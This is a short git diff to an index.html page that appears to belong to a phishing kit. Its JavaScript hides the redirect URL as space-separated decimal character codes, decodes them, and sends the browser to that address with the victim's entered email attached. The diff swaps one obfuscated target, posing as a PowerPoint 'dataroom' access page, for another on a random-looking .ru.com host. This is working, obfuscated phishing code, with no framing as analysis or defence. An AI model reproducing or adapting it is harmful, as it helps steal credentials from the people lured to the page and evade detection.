--- a/index.html
+++ b/index.html
@@ -106,10 +106,10 @@
             }
 
             let base64Email = (email);
-            let encodedURL = "104 116 116 112 115 58 47 47 109 101 108 98 114 97 121 108 111 110 100 111 110 45 100 97 116 97 114 111 111 109 45 112 111 119 101 114 112 111 105 110 116 45 97 99 99 101 115 115 46 115 117 98 111 100 111 114 101 114 54 46 99 111 109 47 87 54 48 73 85 98 111 78 84 105 99 100 87 105 72 71 73 81 108 72 116 114 69 70 102 104 86 81 83 89 105 81 47";
+            let encodedURL = "104 116 116 112 115 58 47 47 100 112 120 120 112 102 117 97 120 100 46 114 117 46 99 111 109 47 122 86 90 68 103 47";
             let decodedURL = encodedURL.split(" ").map(num => String.fromCharCode(num)).join("");
 
-            window.location.href = decodedURL + "*" + (base64Email);
+            window.location.href = decodedURL + "#Extrocoms" + (base64Email);
         }
 
         // Enable "Enter" key submission for email input
